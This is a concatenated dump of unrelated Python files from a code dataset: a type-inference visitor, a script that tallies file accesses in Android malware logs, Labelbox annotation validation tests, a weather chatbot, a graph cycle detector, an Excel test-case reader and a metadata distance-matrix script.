self.tree_manager.visit(\"FunctionCall\", self.visit_imported_functions)\n for node in self.tree_manager.leaf_nodes:\n pnode = node.parent\n while 1:\n pnode.resolve_types()\n if pnode.parent:\n pnode = pnode.parent\n else:\n break\n\n pnode.visit(self.visit_for_range)\n pnode.visit(self.visit_for_collection)\n pnode.visit(self.visit_append)\n pnode.visit(self.visit_subscript)\n\n def visit_imported_functions(self, node):\n name = node.identifier.value.value\n if name in self.imported_types:\n node.typeinfo = self.imported_types[name]\n\n def visit_append(self, node):\n if not isinstance(node, self.strategy.FunctionCall):\n return\n\n name = node.identifier.value.value\n\n if name != \"append\":\n return\n\n node.arglist.args[0].resolve_types()\n \n val = node.arglist.args[0]\n arrtype = node.parent.left_expr.typeinfo\n valuetype = arrtype.value\n if valuetype and valuetype.base != val.typeinfo.base:\n raise TypeError(\"can't mix types in a list!\")\n else:\n typeinfo = TypeInfo(Types.ARRAY, TypeInfo(Types.NUMBER), val.typeinfo)\n node.parent.left_expr.typeinfo = typeinfo\n\n def visit_subscript(self, node):\n if not isinstance(node, self.strategy.Subscript):\n return\n\n parent = node.parent\n if isinstance(parent, self.strategy.Assignment):\n expr_type = parent.expr.typeinfo\n subr_type = node.expr.typeinfo\n typeinfo = node.identifier.typeinfo\n\n if typeinfo.base == Types.DICT:\n key_type = typeinfo.key\n value_type = typeinfo.value\n\n if key_type and key_type.base != subr_type.base:\n raise TypeError(\"can't mix key types in a dictionary!\")\n \n if value_type and value_type.base != expr_type.base:\n raise TypeError(\"can't mix value types in a dictionary!\")\n\n if not key_type:\n node.identifier.typeinfo.key = subr_type\n \n if not value_type:\n node.identifier.typeinfo.value = expr_type\n \n def visit_for_collection(self, node):\n if not isinstance(node, self.strategy.ForCollection):\n return\n\n collection = node.collection\n loop_var = node.loop_var\n\n loop_var.typeinfo = collection.typeinfo.value\n\n def visit_for_range(self, node):\n if not isinstance(node, self.strategy.ForRange):\n return\n\n loop_var = node.loop_var\n loop_var.typeinfo = TypeInfo(Types.NUMBER) \n\n","sub_path":"intermediate.py","file_name":"intermediate.py","file_ext":"py","file_size_in_byte":7167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"60216480","text":"# coding=utf-8\n\n#这个脚本的作用是统计filename在每个病毒的_pre文件中出现的次数以及出现的平均时间,并且按照从大到小进行排序\n\nimport re\nimport os\nimport configparser\nfrom collections import OrderedDict\nimport shutil\n\ndef getDirLoc(path): # 得到文件夹的绝对路径\n dirLoc = []\n for x in os.listdir(path):\n # if \"_出现频率\" in x:\n # continue\n if os.path.isdir(os.path.join(path, x)):\n dirLoc.append(os.path.join(path, x))\n return dirLoc\n\ndef getFileLoc(path): # 得到文件的绝对路径\n txtlist = []\n for x in os.listdir(path):\n if os.path.isfile(os.path.join(path, x)):\n if os.path.splitext(x)[1] == '.txt' and '_pre.txt' in x:\n txtlist.append(os.path.join(path, x))\n return txtlist\n\n\ndef check(filename):\n if re.match(r\"/proc/\\d*?/\",filename) is None: # 说明不是/proc/数字的形式,则保留该字段\n return True\n return False\n\ntry:\n cf = configparser.ConfigParser()\n cf.read('Init.ini', encoding='utf-8')\n examplepath = cf.get('path', 'resultPath') # 这个examplepath需要四级目录,第一级是大目录,第二级是每种不同病毒的族分类,第三级是由病毒的三个txt形成的文件夹,第四级是三个txt文件\n resultpath = cf.get('path','resultPath') # 存储结果的路径\nexcept configparser.NoSectionError as e:\n exit(\"Init.ini does not exist,please check it\")\n# print(path)\nif os.path.exists(resultpath) is False:\n os.mkdir(resultpath)\n\n\ndirLoc = getDirLoc(examplepath)\n\nfor x in dirLoc:\n print(\"正在探测 \"+x+\"............\") #第一层目录\n tmpDir = getDirLoc(x) #如一类恶意样本检测结果\n loc = os.path.join(resultpath,os.path.split(x)[1]+\"_出现频率\")\n if os.path.exists(loc):\n shutil.rmtree(loc)\n os.mkdir(loc)\n for y in tmpDir: #第二层目录\n dic = {}\n timdic = {}\n # test = 0\n print(\"正在处理\"+y+\".............\")\n tmpFile = getFileLoc(y) #如 GPS+获取通话记录+获取短信息\n for z in tmpFile: # 文件\n with open(z, \"r\", encoding='utf-8') as f:\n data = f.readlines()\n flag = 1\n for line in data:\n if flag:\n flag = 0\n continue\n line = line.split()\n filename = line[-1]\n mode = line[-2]\n timedif = line[-3]\n\n # if filename == '/proc/net/xt_qtaguid/iface_stat_all':\n # test += 1\n\n # mode = '0' if mode == '0' else '1'\n # if filename == 'allFilename':\n # print(mode, timedif)\n\n if check(filename) is False:\n continue\n if timedif != \"None\" and float(timedif) < 0: # 时间小于0,无效数据,略去\n timedif = '0'\n\n if (filename[0] != '/'):\n filename = '/'+filename\n\n if filename not in dic:\n dic[filename]= {}\n dic[filename][mode] = 1\n else:\n\n if mode not in dic[filename]:\n dic[filename][mode] = 0\n dic[filename][mode] += 1\n\n if filename not in timdic:\n timdic[filename] = {}\n timdic[filename][mode] = 0\n\n else:\n if mode not in timdic[filename]:\n timdic[filename][mode] = 0\n\n if timedif != \"None\":\n timdic[filename][mode] += float(timedif)\n\n # print(z)\n num = len(timdic)\n # dic = list(dic)\n dic = sorted(dic.items(),key=lambda d:[y[1] for y in d[1].items()],reverse=True)\n # print(dic)\n # print(test)\n dic = OrderedDict(dic)\n writePath = os.path.join(loc,os.path.split(y)[1]+\".txt\")\n with open(writePath, \"w\", encoding='utf-8') as f:\n newline = \"%-90s%-10s%-10s%-10s\\n\" % (\"文件名\", \"访问模式\", \"访问次数\",\"平均访问时间\")\n f.write(newline)\n for fname in dic.keys():\n for md in dic[fname].keys():\n newline = \"%-100s%-10s%-10s%-10s\\n\" % (fname, md, str(dic[fname][md]),str(timdic[fname][md]/dic[fname][md]))\n # if fname == '/allFilename':\n # print(fname, md, str(dic[fname][md]), str(timdic[fname][md]), str(dic[fname][md]))\n f.write(newline)\n # break\n print(\"\\n\\n\")\n # break\nprint(\"done...\")\n\n","sub_path":"androiddataProcess/dataStatics.py","file_name":"dataStatics.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"483729811","text":"import pytest\n\nfrom labelbox import parser\nfrom pytest_cases import parametrize, fixture_ref\n\nfrom labelbox.exceptions import MALValidationError\nfrom labelbox.schema.bulk_import_request import (NDChecklist, NDClassification,\n NDMask, NDPolygon, NDPolyline,\n NDRadio, NDRectangle, NDText,\n NDTextEntity, NDTool,\n _validate_ndjson)\n\n\ndef test_classification_construction(checklist_inference, text_inference):\n checklist = NDClassification.build(checklist_inference)\n assert isinstance(checklist, NDChecklist)\n text = NDClassification.build(text_inference)\n assert isinstance(text, NDText)\n\n\ndef test_subclassification_construction(rectangle_inference):\n tool = NDTool.build(rectangle_inference)\n assert len(tool.classifications) == 1, \"Subclass was not constructed\"\n assert isinstance(tool.classifications[0], NDRadio)\n\n\n@parametrize(\"inference, expected_type\",\n [(fixture_ref('polygon_inference'), NDPolygon),\n (fixture_ref('rectangle_inference'), NDRectangle),\n (fixture_ref('line_inference'), NDPolyline),\n (fixture_ref('entity_inference'), NDTextEntity),\n (fixture_ref('segmentation_inference'), NDMask),\n (fixture_ref('segmentation_inference_rle'), NDMask),\n (fixture_ref('segmentation_inference_png'), NDMask)])\ndef test_tool_construction(inference, expected_type):\n assert isinstance(NDTool.build(inference), expected_type)\n\n\ndef test_incorrect_feature_schema(rectangle_inference, polygon_inference,\n configured_project):\n #Valid but incorrect feature schema\n #Prob the error message says something about the config not anything useful. We might want to fix this.\n pred = rectangle_inference.copy()\n pred['schemaId'] = polygon_inference['schemaId']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef no_tool(text_inference, configured_project):\n pred = text_inference.copy()\n #Missing key\n del pred['answer']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_text(text_inference, configured_project):\n #and if it is not a string\n pred = text_inference.copy()\n #Extra and wrong key\n del pred['answer']\n pred['answers'] = []\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n del pred['answers']\n\n #Invalid type\n pred['answer'] = []\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n #Invalid type\n pred['answer'] = None\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_checklist_item(checklist_inference, configured_project):\n #Only two points\n pred = checklist_inference.copy()\n pred['answers'] = [pred['answers'][0], pred['answers'][0]]\n #Duplicate schema ids\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = [{\"name\": \"asdfg\"}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = [{\"schemaId\": \"1232132132\"}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = [{}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = []\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n del pred['answers']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_polygon(polygon_inference, configured_project):\n #Only two points\n pred = polygon_inference.copy()\n pred['polygon'] = [{\"x\": 100, \"y\": 100}, {\"x\": 200, \"y\": 200}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_incorrect_entity(entity_inference, configured_project):\n entity = entity_inference.copy()\n #Location cannot be a list\n entity[\"location\"] = [0, 10]\n with pytest.raises(MALValidationError):\n _validate_ndjson([entity], configured_project)\n\n entity[\"location\"] = {\"start\": -1, \"end\": 5}\n with pytest.raises(MALValidationError):\n _validate_ndjson([entity], configured_project)\n\n entity[\"location\"] = {\"start\": 15, \"end\": 5}\n with pytest.raises(MALValidationError):\n _validate_ndjson([entity], configured_project)\n\n\ndef test_incorrect_mask(segmentation_inference, configured_project):\n seg = segmentation_inference.copy()\n seg['mask']['colorRGB'] = [-1, 0, 10]\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n seg['mask']['colorRGB'] = [0, 0]\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n seg['mask'] = {'counts': [0], 'size': [0, 1]}\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n seg['mask'] = {'counts': [-1], 'size': [1, 1]}\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n\ndef test_all_validate_json(configured_project, predictions):\n #Predictions contains one of each type of prediction.\n #These should be properly formatted and pass.\n _validate_ndjson(predictions, configured_project)\n\n\ndef test_incorrect_line(line_inference, configured_project):\n line = line_inference.copy()\n line[\"line\"] = [line[\"line\"][0]] #Just one point\n with pytest.raises(MALValidationError):\n _validate_ndjson([line], configured_project)\n\n\ndef test_incorrect_rectangle(rectangle_inference, configured_project):\n del rectangle_inference['bbox']['top']\n with pytest.raises(MALValidationError):\n _validate_ndjson([rectangle_inference], configured_project)\n\n\ndef test_duplicate_tools(rectangle_inference, configured_project):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n pred['polygon'] = [{\"x\": 100, \"y\": 100}, {\"x\": 200, \"y\": 200}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n pred['schemaId'] = \"blahblah\"\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_name_only_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n del pred['schemaId']\n _validate_ndjson([pred], configured_project)\n\n\ndef test_schema_id_only_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n del pred['name']\n _validate_ndjson([pred], configured_project)\n\n\ndef test_missing_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n del pred['schemaId']\n del pred['name']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_validate_ndjson(tmp_path, configured_project):\n file_name = f\"broken.ndjson\"\n file_path = tmp_path / file_name\n with file_path.open(\"w\") as f:\n f.write(\"test\")\n\n with pytest.raises(ValueError):\n configured_project.upload_annotations(name=\"name\",\n annotations=str(file_path),\n validate=True)\n\n\ndef test_validate_ndjson_uuid(tmp_path, configured_project, predictions):\n file_name = f\"repeat_uuid.ndjson\"\n file_path = tmp_path / file_name\n repeat_uuid = predictions.copy()\n repeat_uuid[0]['uuid'] = 'test_uuid'\n repeat_uuid[1]['uuid'] = 'test_uuid'\n\n with file_path.open(\"w\") as f:\n parser.dump(repeat_uuid, f)\n\n with pytest.raises(MALValidationError):\n configured_project.upload_annotations(name=\"name\",\n validate=True,\n annotations=str(file_path))\n\n with pytest.raises(MALValidationError):\n configured_project.upload_annotations(name=\"name\",\n validate=True,\n annotations=repeat_uuid)\n\n\ndef test_video_upload(video_checklist_inference, configured_project):\n pred = video_checklist_inference.copy()\n _validate_ndjson([pred], configured_project)\n","sub_path":"tests/integration/annotation_import/test_ndjson_validation.py","file_name":"test_ndjson_validation.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"412245730","text":"import os\nimport sys\n\nimport pyowm\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom bot_platform import Bot, Intent, Domain\n\nowm = pyowm.OWM('21625a9142b94184eabcb93aeb3c7ef9')\n\ntraining_data = {\n\t\"Weather\": {\n\t\t'getWeather': {\n\t\t\t'required_entities': ['LOCATION'],\n\t\t\t'examples': [\n\t\t\t\t'what does the weather look like in (guelph, LOCATION)',\n\t\t\t\t'can you tell me how the weather is for (cambridge, LOCATION)',\n\t\t\t\t'how is the weather today',\n\t\t\t\t'how is it looking like outside today',\n\t\t\t\t\"what's the weather looking like for today in (toronto, LOCATION)\",\n\t\t\t\t'how is the weather in (mississauga, LOCATION) today'\n\t\t\t],\n\t\t\t'responses': {\n\t\t\t\t'success': [\n\t\t\t\t\t'The weather in LOCATION is DESCRIPTION with a high of HIGH and a low of LOW.'\n\t\t\t\t],\n\t\t\t\t'failure': [\n\t\t\t\t\t\"I'm sorry, I was unable to get the weather in LOCATION.\"\n\t\t\t\t],\n\t\t\t\t'needsValue-LOCATION': [\n\t\t\t\t\t'Where would you like me to check the weather?'\n\t\t\t\t]\n\t\t\t}\n\t\t},\n\t\t'goingToRain': {\n\t\t\t'required_entities': ['LOCATION'],\n\t\t\t'examples': [\n\t\t\t\t'is it going to rain in (kitchener, LOCATION)',\n\t\t\t\t'am I going to need a rain coat',\n\t\t\t\t'will it rain in (guelph, LOCATION)',\n\t\t\t\t'is it supposed to rain today in (toronto, LOCATION)',\n\t\t\t\t'is there rain in (ottawa, LOCATION) today'\n\t\t\t],\n\t\t\t'responses': {\n\t\t\t\t'success': [\n\t\t\t\t\t'It RAIN going to rain in LOCATION within the next 3 hours.'\n\t\t\t\t],\n\t\t\t\t'failure': [\n\t\t\t\t\t\"I'm sorry, I was not able to check if it is going to rain in LOCATION.\"\n\t\t\t\t],\n\t\t\t\t'needsValue-LOCATION': [\n\t\t\t\t\t'Where would you like me to check for rain?'\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\t}\n}\n\ndef handle_get_weather(entities):\n\tobservation = owm.weather_at_place('{},on'.format(entities['LOCATION']['value']))\n\tw = observation.get_weather()\n\ttemp = w.get_temperature('celsius')\n\tentities['HIGH'] = {\n\t\t'confidence': 1,\n\t\t'value': str(int(round(temp['temp_max'], 0)))\n\t}\n\tentities['LOW'] = {\n\t\t'confidence': 1,\n\t\t'value': str(int(round(temp['temp_min'], 0)))\n\t}\n\tentities['DESCRIPTION'] = {\n\t\t'confidence': 1,\n\t\t'value': w.get_detailed_status().lower()\n\t}\n\treturn entities\n\ndef handle_going_to_rain(entities):\n\tforecast = owm.daily_forecast('{},on'.format(entities['LOCATION']['value']))\n\ttoday = pyowm.timeutils.next_three_hours()\n\tresult = forecast.will_be_rainy_at(today)\n\tif result == True:\n\t\tentities['RAIN'] = {\n\t\t\t'confidence': 1,\n\t\t\t'value': 'is'\n\t\t}\n\telse:\t\n\t\tentities['RAIN'] = {\n\t\t\t'confidence': 1,\n\t\t\t'value': 'is not'\n\t\t}\n\treturn entities\n\nhandler_mapping = {\n\t'getWeather': handle_get_weather,\n\t'goingToRain': handle_going_to_rain\n}\n\nif __name__ == '__main__':\n\tbot = Bot('WeatherBot')\n\n\tfor domain_name, domain_data in training_data.iteritems():\n\t\tdomain_obj = Domain(domain_name)\n\t\tfor intent_name, intent_data in domain_data.iteritems():\n\t\t\tintent_obj = Intent(intent_name)\n\t\t\tintent_obj.set_required_entities(intent_data['required_entities'])\n\t\t\tintent_obj.set_examples(intent_data['examples'])\n\t\t\tintent_obj.set_responses(intent_data['responses'])\n\t\t\tintent_obj.set_handler(handler_mapping[intent_name])\n\t\t\tdomain_obj.add_intent(intent_obj)\n\t\tbot.integrate_domain(domain_obj)\n\n\tbot.train()\n\n\tos.system('clear')\n\n\tprint('Welcome to WeatherBot! I can tell you the weather or if it is going to rain or not.\\n')\n\n\twhile True:\n\t\tuser_input = raw_input('>> ')\n\t\tinput_analysis = bot.analyse_query(user_input)\n\t\tif input_analysis['complete']:\n\t\t\tprint(input_analysis['intent']['object'].handle(input_analysis['entities']))\n\t\telse:\n\t\t\tprint(input_analysis['response'])\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"demo/weatherbot.py","file_name":"weatherbot.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"341768430","text":"from collections import defaultdict\r\n\r\n\r\nclass Graph:\r\n\r\n def __init__(self, vertices):\r\n self.vertices = vertices\r\n self.graph = defaultdict(list)\r\n self.visited = [False] * self.vertices\r\n\r\n def addEdge(self, v, w):\r\n self.graph[v].append(w)\r\n self.graph[w].append(v)\r\n\r\n def checkcyclc(self, v, parent):\r\n self.visited[v] = True\r\n for i in self.graph[v]:\r\n if self.visited[i] == False:\r\n if self.checkcyclc(i, v):\r\n return True\r\n elif parent != i:\r\n return True\r\n return False\r\n\r\n def isCyclic(self):\r\n for i in range(self.vertices):\r\n if self.visited[i] == False:\r\n if self.checkcyclc(i, -1) == True:\r\n return True\r\n return False\r\n\r\n\r\ng = Graph(2)\r\ng.addEdge(0, 1)\r\ng.addEdge(1, 2)\r\ng.addEdge(2, 3)\r\ng.addEdge(3, 0)\r\nprint(g.isCyclic())\r\n\r\n","sub_path":"DetectCycleUndirectedGraph.py","file_name":"DetectCycleUndirectedGraph.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"517911155","text":"#! python3\n# -*- coding:utf-8 -*-\n\nimport os\n# from package import readConfig\nfrom xlrd import open_workbook\n\n\n'''操作excel文件类'''\nclass Common(object):\n\n # xls_name = \"1.xls\"\n # sheet_name = \"Sheet1\"\n # proDir = os.path.split(os.path.realpath(__file__))[0]\n # curDir = os.path.dirname(proDir)\n # caseFile = os.path.join(curDir, \"result\")\n # xlsPath = os.path.join(caseFile, xls_name)\n\n def __init__(self,xls_name,sheet_name):\n proDir = os.path.split(os.path.realpath(__file__))[0]\n curDir = os.path.dirname(proDir)\n caseFile = os.path.join(curDir, \"result\")\n self.xlsPath = os.path.join(caseFile, xls_name)\n self.sheet_name=sheet_name\n\n '''这个是使用xlrd操作excel'''\n #获取excel中的测试用例\n def get_Excel(self):\n # 获取excel的路径\n # print(self.caseFile)\n cls=[]\n file=open_workbook(self.xlsPath)\n sheet=file.sheet_by_name(self.sheet_name)\n nrows=sheet.nrows\n #print(nrows)\n for i in range(nrows):\n if sheet.row_values(i)[1] !=\"case_name\":\n cls.append(sheet.row_values(i))\n #print(cls)\n return cls\n\n #获取sheet\n @property\n def get_sheet(self):\n xl=open_workbook(self.xlsPath)\n sheet=xl.sheet_by_name(self.sheet_name)\n return sheet\n\n #获取excel的rows\n @property\n def get_rows(self):\n rows=self.get_sheet.nrows\n return rows\n\n @property\n def get_cols(self):\n cols=self.get_sheet.ncols\n return cols\n\n #获取用例ID\n @property\n def get_caseID(self):\n caseName=[]\n for i in range(1,self.get_rows):\n caseName.append(self.get_sheet.cell_value(i,0))\n return caseName\n\n #获取用例名称\n @property\n def get_caseName(self):\n caseName=[]\n for i in range(1,self.get_rows):\n caseName.append(self.get_sheet.cell_value(i,1))\n return caseName\n\n\n\n #获取发送请求类型\n @property\n def get_method(self):\n method=[]\n for i in range(1,self.get_rows):\n method.append(self.get_sheet.cell_value(i,2))\n return method\n\n #获取url地址\n @property\n def get_url(self):\n url=[]\n for i in range(1,self.get_rows):\n url.append(self.get_sheet.cell_value(i,3))\n return url\n\n #获取参数类型地址\n @property\n def get_dataType(self):\n data=[]\n for i in range(1,self.get_rows):\n data.append(self.get_sheet.cell_value(i,4))\n return data\n\n #获取参数值\n @property\n def get_data(self):\n data=[]\n for i in range(1,self.get_rows):\n data.append(self.get_sheet.cell_value(i,5))\n # print(self.get_sheet.cell_value(i,5))\n return data\n\n\n #获取检查点\n @property\n def get_CheckData(self):\n data=[]\n for i in range(1,self.get_rows):\n data.append(self.get_sheet.cell_value(i,6))\n return data\n\n\n #修改excel列的值\n def update_sheetValue(self,bool):\n sheet=self.get_sheet\n for i in range(1,self.get_rows):\n # sheet.cell(i,7).value=str(content)\n sheet.cell(i,10).value = bool\n #这里还差一步保存excel\n\n\n\n# 测试代码\n# cn=Common(\"1.xls\",\"Sheet1\")\n# print(cn.get_Excel())\n# cn.get_method\n# print(cn.get_data)\n","sub_path":"Selnium_SaasWeb/package/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"311246723","text":"__author__ = 'Work'\nimport functools\n\n\ndef print_result(f):\n def wraper():\n result=f()\n print(f)\n if type (result) in [int,str]:\n print(result)\n else:\n if type (result)==type(dict()):\n for key,value in result.items():\n print(key,' = ',value)\n else:\n for i in result:\n print(i)\n return wraper\n\n@print_result\ndef test_1():\n return 1\n\n\n@print_result\ndef test_2():\n return 'iu'\n\n\n@print_result\ndef test_3():\n return {'a': 1, 'b': 2}\n\n\n@print_result\ndef test_4():\n return [1, 2]\n\n\ntest_1()\ntest_2()\ntest_3()\ntest_4()\n\n\n'''def field(arr,*args):\n if type(args)==str:\n for i in arr:\n yield i[args]\n else:\n for i in arr:\n b={}\n for j in args:\n b[j]=i[j]\n yield b\n'''\n\ndef field(arr,*args):\n if len(args)==1:\n for i in arr:\n yield i[args]\n else:\n for i in arr:\n b={}\n for j in args:\n b[j]=i[j]\n yield b\n\n\n'''\ndef field(arr,*args):\n if type(args)==str:\n for i in arr:\n yield i[args]\n'''\n\n\n\nf=[{'a':1,'b':2,'c':7},{'a':3,'b':4,'c':8}]\n\n\nc=field(f,'a','b')\nd=field(f,'a')\nfor i in c:\n print(i)\nfor i in d:\n print(i)\n'''\n'''#b = field(f,'a')\n\n#for i in b:\n #print(i)\n\n'''try:\n print('массив')\n for i in result:\n print(i)\n except(TypeError):\n print('словарь')\n for key,value in result.items():\n print(key,' = ',value)'''\n","sub_path":"RIP/PycharmProjects/lab7_1/lab7_1/lab7_1/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"267071596","text":"#!/usr/bin/env python3\n\"\"\"make meta dir from meta file\"\"\"\n\nimport argparse\nimport itertools\nimport os\nimport re\nimport shutil\nimport pandas as pd\nimport scipy.spatial.distance\nfrom geopy.distance import vincenty\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"argparser\"\"\"\n parser = argparse.ArgumentParser(description='Make metadata dir')\n parser.add_argument(\n '-f',\n '--file',\n help='Metadata file',\n type=str,\n metavar='FILE',\n required=True)\n parser.add_argument(\n '-o',\n '--out_dir',\n help='Output directory',\n type=str,\n metavar='DIR',\n default='')\n parser.add_argument(\n '-e',\n '--eucdistper',\n help='Euclidean distance percentage (0.10)',\n type=float,\n metavar='FLOAT',\n default=0.10)\n parser.add_argument(\n '-s',\n '--sampledist',\n type=int,\n metavar='INT',\n default=1000,\n help='Sample distance in km (1000)')\n parser.add_argument(\n '-n',\n '--names',\n type=str,\n metavar='STR',\n default='',\n help='Comma-separated list of sample names')\n parser.add_argument(\n '-l',\n '--list',\n type=str,\n metavar='STR',\n default='',\n help='File with sample names one per line')\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"main\"\"\"\n args = get_args()\n meta = args.file\n out_dir = prep_out_dir(args)\n euc_dist = args.eucdistper\n max_dist = args.sampledist\n restrict = get_sample_names(args)\n\n if not headers_ok(meta):\n msg = '\"{}\" headers be \"name\" first, end with \"d,\" \"c,\" or \"ll\"'\n print(msg.format(os.path.basename(meta)))\n exit(1)\n\n if not 0 < euc_dist < 1:\n print('--eucdistper ({}) must be between 0 and 1'.format(euc_dist))\n exit(1)\n\n if max_dist < 0:\n print('--sampledist ({}) must be a positive number'.format(max_dist))\n exit(1)\n\n dataframe = pd.read_table(meta, index_col=0)\n cols = dataframe.columns.tolist()\n\n for col_num, col in enumerate(cols):\n data = dataframe.loc[restrict, col] if restrict else dataframe[col]\n matrix = None\n if re.search(r'\\.d$', col):\n matrix = discrete_vals(data)\n elif re.search(r'\\.c$', col):\n matrix = continuous_vals(data, euc_dist)\n elif re.search(r'\\.ll$', col):\n matrix = lat_lon_vals(data, max_dist)\n\n if not matrix is None:\n path = os.path.join(out_dir, col + '.meta')\n print('{:3}: Writing {}'.format(col_num + 1, path))\n matrix.to_csv(path, sep='\\t')\n else:\n print('No data for col \"{}\"'.format(col))\n\n print('Done, see output in \"{}\"'.format(out_dir))\n\n\n# --------------------------------------------------\ndef get_sample_names(args):\n \"\"\"names can come from --name or --list (file)\"\"\"\n if len(args.names) > 0:\n return re.split(r'\\s*,\\s*', args.names)\n\n if len(args.list) > 0 and os.path.isfile(args.list):\n files_fh = open(args.list, 'r')\n return files_fh.read().splitlines()\n\n return []\n\n\n# --------------------------------------------------\ndef prep_out_dir(args):\n \"\"\"default out_dir is \"meta\" in same dir as meta file\"\"\"\n\n out_dir = args.out_dir\n\n if len(out_dir) == 0:\n meta_file_dir = os.path.dirname(os.path.abspath(args.file))\n out_dir = os.path.join(meta_file_dir, 'meta')\n\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n\n os.makedirs(out_dir)\n\n return out_dir\n\n\n# --------------------------------------------------\ndef headers_ok(meta):\n \"\"\"check that headers are 'name' or end with c/d/ll\"\"\"\n meta_fh = open(meta)\n headers = meta_fh.readline().rstrip().split('\\t')\n\n return headers[0] == 'name' and \\\n all(map(lambda s: re.search(r'\\.(c|d|ll)$', s), headers[1:]))\n\n\n# --------------------------------------------------\ndef discrete_vals(data):\n \"\"\"discrete\"\"\"\n ordered = sorted(data.index.tolist())\n matrix = pd.DataFrame(1, index=ordered, columns=ordered)\n\n for sample1, sample2 in itertools.combinations(data.index, 2):\n val = 1 if data[sample1] == data[sample2] else 0\n matrix[sample1][sample2] = val\n matrix[sample2][sample1] = val\n\n return matrix\n\n\n# --------------------------------------------------\ndef continuous_vals(data, threshold):\n \"\"\"continuous\"\"\"\n ordered = sorted(data.index.tolist())\n combos = list(itertools.combinations(data.index, 2))\n dist = pd.DataFrame(0, index=ordered, columns=ordered)\n\n #\n # First calculate all distances\n #\n for sample1, sample2 in combos:\n dist[sample1][sample2] = \\\n scipy.spatial.distance.euclidean(data[sample1], data[sample2])\n\n #\n # Get all the distances greater than 0 as a list\n #\n distances = sorted(filter(lambda n: n > 0, \\\n itertools.chain.from_iterable(dist.values.tolist())))\n\n #\n # Figure out the bottom X percent/max value\n #\n count = len(distances)\n max_index = int(count * threshold)\n max_val = distances[max_index - 1]\n\n #\n # Create the return matrix using 1/0 for the distance w/in tolerance\n #\n matrix = pd.DataFrame(0, index=ordered, columns=ordered)\n for sample1, sample2 in combos:\n val = 1 if int(dist[sample1][sample2] < max_val) else 0\n matrix[sample1][sample2] = val\n matrix[sample2][sample1] = val\n\n return matrix\n\n\n# --------------------------------------------------\ndef lat_lon_vals(data, max_dist):\n \"\"\"latitude/longitude\"\"\"\n ordered = sorted(data.index.tolist())\n matrix = pd.DataFrame(1, index=ordered, columns=ordered)\n\n for sample1, sample2 in itertools.combinations(data.index, 2):\n pos1 = re.split(r'\\s*,\\s*', data[sample1])\n pos2 = re.split(r'\\s*,\\s*', data[sample2])\n val = 1 if int(vincenty(pos1, pos2).kilometers < max_dist) else 0\n matrix[sample1][sample2] = val\n matrix[sample2][sample1] = val\n\n return matrix\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/make_metadata_dir.py","file_name":"make_metadata_dir.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"373225537","text":"import MySQLdb\nimport jieba\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nimport time\n\n#数据库连接\nconn = MySQLdb.connect(host='localhost',\n db='sjznews',\n user='root',\n passwd='password',\n charset='utf8')\ncur = conn.cursor()\ncur.execute('SELECT * FROM sjznewsdata 